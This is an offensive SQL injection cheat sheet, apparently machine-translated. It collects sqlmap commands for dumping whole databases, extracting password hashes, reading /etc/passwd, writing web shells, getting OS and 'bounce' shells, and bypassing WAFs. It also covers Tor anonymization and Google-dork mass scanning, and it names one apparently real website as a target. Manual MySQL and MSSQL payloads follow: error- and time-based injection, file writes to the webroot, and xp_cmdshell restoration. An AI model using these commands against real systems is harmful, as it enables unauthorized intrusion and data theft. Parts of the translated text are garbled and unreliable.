# Basic usage ./sqlmap.py -u "inject address" --dbs // enumerate database ./sqlmap.py -u "inject address" --current-db // current database ./sqlmap.py -u "inject address" --users // column database user ./sqlmap.py -u "inject address" --current-user // current user ./sqlmap.py -u "inject address" --tables -D "database" // enumerate the table name of the database ./sqlmap.py -u "inject address" --columns -T "table name" -D "database" // get the column name of the table ./sqlmap.py -u "inject address" --dump -C "field, field" -T "table name" -D "database" // get the data in the table, including the column, is the pants # bypass WAF : --tamper= apostrophemask,apostrophenullencode,chardoubleencode,escapequotes,overlongutf8,space2plus,symboliclogical,base64encode,unionalltounion,xforwardedfor,multiplespaces,nonrecursivereplacement # Cookie injection: sqlmap.py -u URL --cookie "parameter" --tables --level 2 # POST login box injection: sqlmap.py -r FILE.TXT -p username --tables --forms -v 3 --dbs --batch --os "Windows" --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py Bypass WAF : sqlmap.py -u "inject address" -v 3 --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py Sqlmap.py -u URL -v 3 -dbms "MySQL" --tamper "space2morehash.py" --referer "http://www.google.com" - -user-agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" sqlmap.py -r FILE.TXT -p username --tables --forms -v 3 --dbs --batch --os "Windows" --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py # Submit using the POST method sqlmap -u "http://192.168.1.1/sqlmap/oracle/post_int.php" --method POST --data "id=1" sqlmap -u "https://xxxxx//search.aspx" --forms --batch --crawl=10 --dbms=MSSQL --dbs --current-db --technique=BEUST --risk=3 --level=3 # Read the database version, current user, current database Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 -f -b --current-user --current-db -v 1 # Determine the current database user permissions Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --privileges -U username-v 1 Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --is-dba -U username-v 1 # Read the passwords of all database users or specified database users Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --users --passwords -v 2 Sqlmap.py-u http://www.xxxxx.com/test.php?p=2 --passwords -U root -v 2 # Get all the databases Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --dbs -v 2 # Get all the tables in the specified database Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --tables -D mysql -v 2 # Get the field of the specified table in the specified database name Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --columns -D mysql -T users -v 2 # Get the data of the specified field in the specified table in the specified database name Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --dump -D mysql -T users -C "username,password" -s "sqlnmapdb.log" -v 2 # file-read read web file Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --file-read "/etc/passwd" -v 2 # file-write writes files to the web Sqlmap.py -u http://www.xxxxx.com/test.php?p=2 --file-write /localhost/mm.php --file-dest /var/www/html/xx.php -v 2 #union Query table record Sqlmap.py -u "http://url/news?id=1" --union-cols # injection # Get the current user name Sqlmap.py -u "http://url/news?id=1" --current-user # Get the current database name Sqlmap.py -u "http://www.xxoo.com/news?id=1" --current-db # listname Sqlmap.py -u "http://www.xxoo.com/news?id=1" --tables -D "db_name" #column field Sqlmap.py -u "http://url/news?id=1" --columns -T "tablename" users-D "db_name" -v 0 #Get the field contents Sqlmap.py -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0 # smart smart level Execution test level Sqlmap.py -u "http://url/news?id=1" --smart --level 3 --users # dbms Specify database type Sqlmap.py -u "http://url/news?id=1" --dbms "Mysql" --users #column database user Sqlmap.py -u "http://url/news?id=1" --users # Instructions for use: Injection point: www.xxx.com/user.jsp?id=1 1. Determine if the injection exists sqlmap.py -u "www.xxx.com/user.jsp?id=1" 2. Get the database (Access database does not need to be obtained) sqlmap.py -u "www.xxx.com/user.jsp?id=1" --dbs 3. View the database used by the current application (Access database does not need to be obtained) sqlmap.py -u "www.xxx.com/user.jsp?id=1" --current-db 4. List all the tables of the specified database sqlmap.py -u "www.xxx.com/user.jsp?id=1" --table -D database 5. Read the field name in the specified table Sqlmap.py -u "www.xxx.com/user.jsp?id=1" --columns -T "datasheet" -D "database" 6. Read the contents of the specified field Sqlmap.py -u "www.xxx.com/user.jspid=1" --dump -C" field" -T "datasheet" -D "database" After reading the data, Sqlmap will dump the read data to the Sqlmap/output/ directory, and the file will be saved as "Table.cvs". 1. Test injection point permissions Sqlmap.py -u "URL" --privileges //Test permissions for all users Sqlmap.py -u "URL" --privileges -U sa //Test sa user rights 2. Execute the Shell command Sqlmap.py -u "URL" --os-cmd="net user" //Execute the net user command Sqlmap.py -u "URL" --os-shell //System interaction shell 3. Get the current database name sqlmap.py -u "URL" --current-db 4. Execute the SQL command Sqlmap.py -u "URL" --sql-shell //Returns the SQL interaction shell and can execute SQL statements Sqlmap.py -u "URL" --sql-query="sql" 5.POST submission method Sqlmap.py -u "URL" --data "POST parameter" 6. Display detailed levels sqlmap.py -u "URL" --dbs -v 1 The -v parameter contains the following seven levels. 0: only show Python backtracking, errors and key messages; 1: Display information and warning information; 2: Display debugging information; 3: payload injection; 4: Display HTTP request; 5: Display HTTP response headers; 6: Display the contents of the HTTP response page. 7. Inject HTTP request Sqlmap.py -r head.txt --dbs //head.txt content is an HTTP request Head.txt can capture the contents of the burstsuit 8. Connect directly to the database sqlmap.py -d"mysql://admin:admin@192.168.1.1:3306/testdb" --dbs 9. Injection level sqlmap.py -u "URL" --level 3 10. Insert the injection statement into the specified location (usually used for pseudo-static injection) sqlmap.py -u "http://www.xxx.com/id/2*.html" --dbs 11. Use the Sqlmap plugin sqlmap.py -u "URL" --tamper "space2morehash.py" Sqlmap Tamper Script name: apostrophemask.py Role: use utf8 instead of quotes example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' Claim: All Script name: equaltolike.py Role: like instead of the equal sign example: SELECT · FROM users WHERE id=1 SELECT · FROM users WHERE id LIKE 1 Claim: ·Microsoft SQL Server 2005 · MySQL 4, 5.0 and 5.5 ## Sqlmap common parameters and instructions -b get banner -p specifies test parameters -g Get the URL from Google, -g "inurl:aspx?id=" --gpage=GOOGLEPAGE Specify Google Page Numbers --union-check Whether to support union injection --union-cols union query table record --union-test union statement test --union-use uses union injection --proxy proxy injection --threads using multithreading --user-agent custom user-agent --referer=REFERER HTTP referer header --proxy=PROXY Use proxy --string specifies keywords --tor creates an anonymous network of tor --predict-output common query output prediction --keep-alive uses a persistent HTTP(S) connection --eval=EVALCODE Pollution with HTTP parameters -a,-all query all --hostname hostname --is-dba is admin rights --users enumerates all users --password enumerates all user passwords --roles enumerates all user roles --schema enumeration DBMS mode --count retrieves the total number of entries --dump to dump the DBMS database table project, you need to develop the field name (column name) --dump-all dumps all table items in the DBMS database --search searches for a column, table, or database name --exclude-sysdbs Excludes the system database when enumerating tables --sql-query=query Execute SQL statement --file-read=RFILE read operation --file--write=WFILE write operation --file--dest=DFILE absolute path write --reg-read reads a Windows registry key value --reg-add adds a Windows registry key value data --reg-del deletes a Windows registry key value data --reg-key=REGKEY Windows registry key --reg-value=REGVAL Windows registry key --reg-data=REGDATA Key-value item data for the Windows registry --reg-type=REGTYPE Value type of the Windows registry key --dump-format=DUMP dump data format (CSV (default), HTML or SQLITE) --hex Use hexadecimal data retrieval --output-dir=ODIR directory path for custom output --update update Sqlmap --purge-output safely deletes the output directory of all content --check-waf heuristic check WAF/IPS/IDS protection --os-pwn bounce shell --cookie=COOKIE specifies HTTP cookie, pre-login --random-agent Use randomly selected User-Agent --tamper=TAMPER using the Sqlmap plugin --level test level (1-5), default is 1 --auth-type Digest --auth-cred "testuser:testpass" --auth-type Basic --auth-cred "testuser:testpass" --dbms "PostgreSQL" * MySQL * Oracle * PostgreSQL * Microsoft SQL Server --os "Windows" * Linux * Windows # Access to information Sqlmap -u "http://url/news?id=1" --dbms "Mysql" --users # dbms Specify database type Sqlmap -u "http://url/news?id=1" --users #column database user Sqlmap -u "http://url/news?id=1" --dbs #column database Sqlmap -u "http://url/news?id=1" --passwords #database user password Sqlmap -u "http://url/news?id=1" --passwords -U root -v 0 #list the password of the specified user database Sqlmap -u "http://url/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 #list designation Field, list 20 Sqlmap -u "http://url/news?id=1" --dump-all -v 0 #List all tables in all databases Sqlmap -u "http://url/news?id=1" --privileges #View Permissions Sqlmap -u "http://url/news?id=1" --privileges -U root #View specified user permissions Sqlmap -u "http://url/news?id=1" --is-dba -v 1 #is it a database administrator? Sqlmap -u "http://url/news?id=1" --roles #enumrate database user roles Sqlmap -u "http://url/news?id=1" --udf-inject #Import user-defined functions (get system privileges!) Sqlmap -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0 #list out all tables in the current library Sqlmap -u "http://url/news?id=1" --union-cols #union Query table record Sqlmap -u "http://url/news?id=1" --cookie "COOKIE_VALUE" #cookie injection Sqlmap -u "http://url/news?id=1" -b #Get banner information Sqlmap -u "http://url/news?id=1" --data "id=3" #postinjection Sqlmap -u "http://url/news?id=1" -v 1 -f #fingerprint database type Sqlmap -u "http://url/news?id=1" --proxy "http://127.0.0.1:8118" # Agent injection Sqlmap -u "http://url/news?id=1" --string "STRING_ON_TRUE_PAGE" #Specify keywords Sqlmap -u "http://url/news?id=1" --sql-shell #Execute the specified sql command Sqlmap -u "http://url/news?id=1" --file /etc/passwd Sqlmap -u "http://url/news?id=1" --os-cmd=whoami #Execute system commands Sqlmap -u "http://url/news?id=1" --os-shell #system interactive shell Sqlmap -u "http://url/news?id=1" --os-pwn #bounce shell Sqlmap -u "http://url/news?id=1" --reg-read # read win system registry Sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" # Save the progress Sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume # Restore saved progress # Fingerprinting the remote system and its database sqlmap.py -u "http://localhost/weak.php?id=10" -b Output : [11:19:51] [INFO] the back-end DBMS is MySQL [11:19:51] [INFO] fetching banner [11:19:51] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval [11:19:51] [INFO] retrieved: 5.1.61 web server operating system: Linux Red Hat Enterprise 6 (Santiago) web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL 5.0.11 banner: '5.1.61' # fetch the list of users and roles sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10 database management system users [5]: [*] ''@'localhost' [*] ''@'localhost.localdomain' [*] 'root'@'127.0.0.1' [*] 'root'@'localhost' [*] 'root'@'localhost.localdomain' database management system users password hashes: [*] [1]: password hash: NULL [*] root [2]: password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 password hash: NULL # Reading a system file sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10 # Run arbitrary sql command sqlmap.py -u "http://localhost/weak.php?id=10" --sql-query="select now();" output : [11:50:22] [INFO] retrieved: 2013-04-15 11:51:10 select now();: '2013-04-15 11:51:10' # Interactive shell sqlmap.py -u "http://www.xxx.com" --os-cmd "ipconfig" sqlmap.py -u "http://www.xxx.com" --os-shell sqlmap.py -u "http://www.xxx.com" --os-pwn sqlmap.py -u "http://www.xxx.com" --sql-shell # Form sql : /sqlmap.py -u "http://www.xxx.com" --forms --batch --crawl=10 --data "tfUName=1&UPass=1" --cookie "id=9" -p tfUPass # WAF bypass /sqlmap.py -u "http://www.xxx.com" --forms --batch --crawl=10 --data "tfUName=1&UPass=1" --cookie "id=9" -p tfUPass --tamper="space2hash.py" -v 3 --dbs # Tor with sqlmap : apt-get install -y tor Start the Tor service sudo service tor start sqlmap.py --tor --tor-type=SOCKS5 -g "inurl:.php?id=1" --random-agent --dump-all --batch --time-sec=15 -v parameter, level of detail, observe how sqlmap is trying to judge a point and read data. ## There are seven levels, the default is 1: 0, only show python errors and serious information. 1. Display basic information and warning information at the same time. (default) 2. Display debug information at the same time. 3. Display the injected payload at the same time. 4. Display HTTP requests at the same time. 5. Display the HTTP response header at the same time. 6. Display the HTTP response page at the same time. # Use sqlmap to remove pants The –dump parameter is used to remove the pants. Add the whole -all(–dump-all) if you drag the whole Specify the field specified in the specified table: sqlmap -u "http://xxx/index.php?id=1" --dump -D DBName -T TableName -C "id,username,password" Take off the entire pants: sqlmap -u "http://xxx/index.php?id=1" -D DBName --dump-all # Advanced usage -p name Multiple parameters such as index.php?n_id=1&name=2&data=2020 We want to specify the name parameter to inject Sqlmap -g "google syntax" --dump-all --batch #google search injection point automatically runs out all fields, you need to ensure that google.com can access normally --technique test specifies the type of injection\technology used Test all injection techniques by default without parameters • B: Boolean based SQL blind • E: based on error sql injection • U: based on UNION injection • S: stacked sql injection • T: Time-based blind --tamper bypasses the WEB firewall (WAF) Sqlmap by encoding by default with char() --tamper plugin directory \sqlmap-dev\tamper Sqlmap -u "http:// www.2cto.com /news?id=1" --smart --level 3 --users #smart Intelligent level execution test level Attack example: Sqlmap -u "http://url/news?id=1&Submit=Submit" --cookie="xxx" --string="Surname" --dbms=mysql --user --password # Request These options can be used to specify how to connect to the target URL : --data=DATA Data string sent via POST --cookie=COOKIE HTTP Cookie header --cookie-urlencode URL encoding generated by cookie injection --drop-set-cookie Ignore the Set-Cookie header of the response --user-agent=AGENT Specifies the HTTP User --Agent header --random-agent uses a randomly selected HTTP User --Agent header --referer=REFERER Specifies the HTTP Referer header --headers=HEADERS Wrap separate, add other HTTP headers --auth-type=ATYPE HTTP authentication type (basic, digest or NTLM) (Basic, Digest or NTLM) --auth-cred=ACRED HTTP authentication credentials (username: password) --auth-cert=ACERT HTTP certificate (key_file, cert_file) --proxy=PROXY Connect to the target URL using an HTTP proxy --proxy-cred=PCRED HTTP Proxy Authentication Credentials (Username: Password) --ignore-proxy ignores the system default HTTP proxy --delay=DELAY The delay between each HTTP request in seconds --timeout=TIMEOUT Time to wait for the connection to time out (default is 30 seconds) --retries=RETRIES Time to reconnect after connection timeout (default 3) --scope=SCOPE Regular expression for the filter target from the provided proxy log --safe-url=SAFURL The url address that is frequently accessed during the test. --safe-freq=SAFREQ Test request between visits, giving a secure URL # Enumeration These options can be used to enumerate information about the back-end database management system, the structure and data in the tables. In addition, you can also run your own SQL statements. -b, --banner Retrieve the identity of the database management system --current-user retrieves the current user of the database management system --current-db retrieves the current database of the database management system --is-dba Detects whether the DBMS current user is DBA --users enumerates database management system users --passwords enumerates database management system user password hashes --privileges enumerates permissions for database management system users --roles enumerates the roles of database management system users --dbs enumerates the database management system database --tables enumerates tables in the DBMS database --columns enumerates DBMS database table columns --dump dumps the entries in the database of the database management system --dump-all dumps entries in all DBMS database tables --search search column(s), table(s) and/or database name(s) -D DB The name of the database to be enumerated -T TBL Database table to be enumerated -C COL Database column to be enumerated -U USER database user used for enumeration --exclude-sysdbs Exclude system database when enumerating tables --start=LIMITSTART The first query output goes into the search --stop=LIMITSTOP The output of the last query goes into the search --first=FIRSTCHAR Character search for the first query output word --last=LASTCHAR Output word character retrieval for the last query --sql-query=QUERY SQL statement to execute --sql-shell prompts interactive SQL shell # Optimization These options can be used to optimize the performance of SqlMap. -o turn on all optimization switches --predict-output predicts common query output --keep-alive uses a persistent HTTP(S) connection --null-connection retrieves page length from no actual HTTP response body --threads=THREADS Maximum HTTP(S) request concurrency (default is 1) -p TESTPARAMETER testable parameters (S) --dbms=DBMS forces the backend DBMS to this value --os=OS forces the backend DBMS operating system to this value --prefix=PREFIX injection payload string prefix --suffix=SUFFIX injection payload string suffix --tamper=TAMPER Tampering with injected data using the given script(s) # Detection These options can be used to specify how to parse and compare the contents of an HTTP response page when the SQL blinds. --level=LEVEL The level at which the test is performed (1-5, default is 1) --risk=RISK Risk of performing tests (0-3, default is 1) --string=STRING Matches the string when the query is valid --regexp=REGEXP Query regular expression on page when valid --text-only based only on text content comparison pages # Techniques These options can be used to tune specific SQL injection tests. --technique=TECH SQL injection technology test (default BEUST) --time-sec=TIMESEC DBMS response delay time (default is 5 seconds) --union-cols=UCOLS Queued range for testing UNION query injection --union-char=UCHAR Character used to violently guess the number of columns # Fingerprint (fingerprint) -f, –fingerprint Execute checks for extensive DBMS version fingerprints # Brute force These options can be used to run brute force checks. --common-tables check for the existence of a common table --common-columns check for common columns # User-defined function injection These options can be used to create user-defined functions. --udf-inject injection user-defined function --shared-lib=SHLIB local path to the shared library # File system access These options can be used to access the underlying file system of the backend database management system. --file-read=RFILE Reads files from the backend database management system file system --file-write=WFILE Edit the local file on the backend database management system file system --file-dest=DFILE The absolute path of the file management system write file to the backend # Operating system access These options can be used to access the underlying operating system of the back-end database management system. --os-shell interactive operating system shell --os-pwn Get an OOB shell, meterpreter or VNC --os-smbrelay Get an OOB shell, meterpreter or VNC with one click --os-bof stored procedure buffer overflow exploit --priv-esc database process user privilege --msf-path=MSFPATH Metasploit Framework local installation path --tmp-path=TMPPATH Absolute path to the remote temporary file directory # Windows registry access These options can be used to access the backend database management system Windows registry. --reg-read read a Windows registry key value --reg-add writes a Windows registry key value data --reg-del removes the Windows registry key --reg-key=REGKEY Windows registry key --reg-value=REGVAL Windows registry key value --reg-data=REGDATA Windows registry key value data --reg-type=REGTYPE Windows registry key value type # General These options can be used to set some general working parameters. -t TRAFFICFILE logs all HTTP traffic to a text file -s SESSIONFILE Saves and restores all data retrieved from the session file --flush-session refresh the current target session file --fresh-queries ignores query results stored in session files --eta shows the estimated arrival time of each output --update Update SqlMap --save file Save options to the INI configuration file --batch never asks for user input, using all default configurations. # Miscellaneous (miscellaneous) --beep find reminders when SQL injection --check-payload IDS detection test for injected payloads --cleanup SqlMap concrete UDF and table cleanup DBMS --forms parsing and testing form of target URL --gpage=GOOGLEPAGE Use Google Dork results from the specified page number --page-rank Google dork results show page rank (PR) --parse-errors parse database management system error messages from the response page --replicate copy dumped data to a sqlite3 database --tor uses the default Tor (Vidalia / Privoxy / Polipo) proxy address --wizard Simple wizard interface for beginners # Partial usage of SQLMAP 1) to determine whether the current user is dba python sqlmap.py -u "url" --is-dba -v 1 2)--users: list database management system user python sqlmap.py -u "url" --users -v 0 3)--passwords: database user password (hash) python sqlmap.py -u "url" --passwords -v 0 python sqlmap.py -u "url" --passwords -U Sa -v 0 4) View user permissions python sqlmap.py -u "url" --privileges -v 0 python sqlmap.py -u "url" --privileges -U postgres -v 0 5)--dbs can be utilized Database python sqlmap.py -u "url" --dbs -v 0 6)--tables column database table python sqlmap.py -u "url" --tables -D "information_scheam" -D: specify the data name 7)- -columns lists the column names in the table python sqlmap.py -u "url"--columns -T "user" -D "mysql" -v 1 -T: specify the name of the table, -D: specify the name of the library 8) --- The contents of the specified column in the list of db python sqlmap.py -u "url" --dump -T "users" -D "testdb" -C: can specify the specified column range of 2 to 4 python sqlmap. Py -u "url" --dump -T "users" -D "testdb" --start 2 --stop 4 -v 0 9)--dumap-all lists all databases, all table contents python sqlmap.py - u "url" --dump-all -v 0 only lists the contents of the user's own new database and table python sqlmap.py -u "url" --dump-all --exclude-sysdbs -v 0 10)-- File read file contents [load_file() function] python sqlmap.py -u "url" --file /etc/password 11) Execute SQL python sqlmap.py -u "url" --sql-shell 12)-p Specify Parameters python sqlmap.py -u "url" -v 1 -p "id" -p can specify multiple parameters -p "cat,id" 13) POST submit python sqlmap.py -u "url" --method POST --data "id=1" 14)COOKIE submission Python sqlmap.py -u "url" --cookie "id=1" -v 1 cookie value can be fetched by TamperData 15)refer trick python sqlmap.py -u "url" --refer "url" -v 3 16 ) Use custom user-agent or user-agents.txt python sqlmap.py -u "url" --user-agent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" -v 3 python sqlmap.py - u "url" -v 1 -a "./txt/user-agents.txt" 17) Use multithreading to guess python sqlmap.py -u "url" -v 1 --current-user --threads 3 18) Specify the database, bypass the automatic detection of SQLMAP python sqlmap.py -u "url" -v 2 --dbms "PostgreSQL" 19) Specify the operating system to bypass SQLMAP to automatically detect python sqlmap.py -u "url" -v 2 - -os "Windows" 20)--prefix and --postfix Custom payload python sqlmap.py -u "url" -v 3 -p "id" --prefix "'" --postfix "and 'test'='test" 21)Union injection test python sqlmap.py -u "url" --union-test -v -1 22)With order by python sqlmap.py -u "url" --union-test --union-tech orderby -v 1 23)python sqlmap.py -u "url" -v 1 --union-use --banner 24)python sqlmap.py -u "url" -v 5 --union-use --current-user 25)python sqlmap.py -u "url" -v 1 --union-use --dbs //Execute SQL statement Sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 1 –sql-shell //More detailed information Sqlmap.py -u "http://www.islamichina.com/hotelinchina.asp?cityid=2&m=1" -v 5 # Mysql commands : SELECT database() SELECT version() SELECT user() select datadir() SELECT @@datadir SELECT user FROM mysql.user SELECT schema_names FROM information_schema.schemata SELECT @@hostname UNION ALL SELECT LOAD_FILE(‘/etc/passwd’) — select @@basedir Select system_user() select current_user() select user() select @@version_compile_os select now() Desc table name or show columns from table name select * from users union select 1,load_file('/etc/passwd'),3; select * from users union select 1,load_file(0x2F6574632F706173737764),3; select '' into outfile '/var/www/html/xxx.php'; select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/xxx.php'; # Get the version number SELECT @@version SELECT version() # host name, IP address SELECT @@hostname; # username and password SELECT host, user, password FROM mysql.user; # username SELECT user(); SELECT system_user(); SELECT user FROM mysql.user; SELECT current_user; SELECT distinct(db) FROM mysql.db SELECT schema_name FROM information_schema.schemata; SELECT table_schema, table_name FROM information_schema.tables WHERE Table_schema = ' customers_db' SELECT table_schema, table_name FROM information_schema.tables WHERE Table_schema!='mysql' AND table_schema!=' information_schema' SELECT table_schema, table_name column_name FROM information_schema.columns WHERE table_schema!='mysql' AND table_schema!=' information_schema' SELECT table_schema, table_name, column FROM Information_schema.columns WHERE table_schema != 'mysql' AND Table_schema != 'information_schema'; SELECT table_schema, table_name column_name FROM information_schema.columns WHERE column_name LIKE 'password' OR column_name LIKE 'credit_card' SELECT grantee, privilege_type, is_grantable SELECT grantee, table_schema, privilege_type FROM Information_schema.schema_ privileges; SELECT load_file('databasename/tablename.MYD') tables_priv.MYD host.MYD help_keyword.MYD columns_priv.MYD db.MYD # User rights related # enumerate user permissions SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges; # enumerate user permissions SELECT host, user, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv FROM mysql.user ; # enumerate database permissions SELECT grantee, table_schema, privilege_type FROM information_schema.schema_privileges; # List columns_priv SELECT table_schema, table_name, column_name, privilege_type FROM information_schema.column_privileges; # List database # current library SELECT database(); # All libraries (Mysql > 5.0) SELECT schema_name FROM information_schema.schemata; # List name # common SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != 'mysql' AND table_schema != 'information_schema' # Find the name of the table based on the column name SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username'; # List field names SELECT table_schema, table_name, column_name FROM information_schema.columns WHERE table_schema != 'mysql' AND table_schema != 'information_schema' # Single data acquisition SELECT host, user FROM user ORDER BY host LIMIT 1 OFFSET 0; SELECT host,user FROM user ORDER BY host LIMIT 0,1; # Error injection And (select 1 from (select count(*), concat(SQL statement, floor(rand(0)*2))x from information_schema.tables group by x)a); And (select count(*) from (select 1 union select null union select !1)x group by concat(SQL statement, floor(rand(0)*2))); And extractvalue(1, concat(0x5c, (SQL statement))); And 1=(updatexml(1,concat(0x5e24,(SQL statement), 0x5e24),1)); # Delay injection SELECT BENCHMARK(1000000,MD5('A')); SELECT SLEEP(5); # File reading and writing #Read file, need relevant permissions UNION SELECT LOAD_FILE('/etc/passwd') # Write file, need relevant permissions SELECT * FROM mytable INTO dumpfile '/tmp/somefile' # Write file, need relevant permissions SELECT * FROM mytable INTO outfile '/tmp/somefile' # Judgment and string correlation # if judging SELECT if(1=1,'foo','bar'); #回 foo # CASE WHEN Judgment SELECT CASE WHEN (1=1) THEN 'A' ELSE 'B' END; # Back A # char function, convert numbers to characters SELECT char(65); # ascii function, convert characters to numbers SELECT ascii('A'); # CONCAT function to connect characters together SELECT CONCAT('A','B'); # string hexadecimal notation SELECT 0×414243; # substring/substr function SELECT substr('abcd', 3, 1); # length function SELECT length('abcd'); # MSSQL # Database version SELECT @@version # host name, IP address SELECT HOST_NAME() # Current user SELECT user_name(); SELECT system_user; SELECT user; SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID # List all users SELECT name FROM master..syslogins #Column password MS MSSQL 2005 SELECT name, password_hash FROM master.sys.sql_logins --* SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins --* # List database SELECT DB_NAME() # enumeration library SELECT name FROM master..sysdatabases; SELECT DB_NAME(N); — where N = 0, 1, 2, # Permission related # Judging current user rights SELECT is_srvrolemember('sysadmin'); SELECT is_srvrolemember('dbcreator'); SELECT is_srvrolemember('bulkadmin'); SELECT is_srvrolemember('diskadmin'); SELECT is_srvrolemember('processadmin'); SELECT is_srvrolemember('serveradmin'); SELECT is_srvrolemember('setupadmin'); SELECT is_srvrolemember('securityadmin'); # Determine the permissions of a specified user SELECT is_srvrolemember('sysadmin', 'sa'); # Determine if it is a library permission And 1=(Select IS_MEMBER('db_owner')) # Determine if there is library read permission And 1= (Select HAS_DBACCESS('master')) # Get the username with a certain permission SELECT name FROM master..syslogins WHERE denylogin = 0; SELECT name FROM master..syslogins WHERE hasaccess = 1; SELECT name FROM master..syslogins WHERE isntname = 0; SELECT name FROM master..syslogins WHERE isntgroup = 0; SELECT name FROM master..syslogins WHERE sysadmin = 1; SELECT name FROM master..syslogins WHERE securityadmin = 1; SELECT name FROM master..syslogins WHERE serveradmin = 1; SELECT name FROM master..syslogins WHERE setupadmin = 1; SELECT name FROM master..syslogins WHERE processadmin = 1; SELECT name FROM master..syslogins WHERE diskadmin = 1; SELECT name FROM master..syslogins WHERE dbcreator = 1; SELECT name FROM master..syslogins WHERE bulkadmin = 1; # Currently owned permissions SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); — current database SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); — current server SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); –permissions on a table SELECT permission_name FROM master..fn_my_permissions('sa', 'USER'); # Error injection # Direct comparison with numbers Id=1 and @@version>0-- Id=1 and user>0-- Id=1 and db_name()>0-- # Convert data into integer error, can be used to explode library name, table name, data name Id=1 and 1=convert(int,(select name from master.dbo.sysdatabases where dbid=7))-- Id=13 having 1=1 -- Id=13 group by table name. field name 1, field name 2 having 1 = 1 -- IF(ascii(SUBSTRING('name',1,1))>0) waitfor delay'0:0:3' # Command execution And select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_regread') #registry And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_makewebtask') #backup And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'sp_addextendedproc') #restore extension And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_subdirs') #Read subdirectory And 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name= 'xp_dirtree') #列目录 # Recovery and division Exec sp_addextendedproc xp_cmdshell, 'xplog70.dll' Exec sp_dropextendedproc 'xp_cmdshell'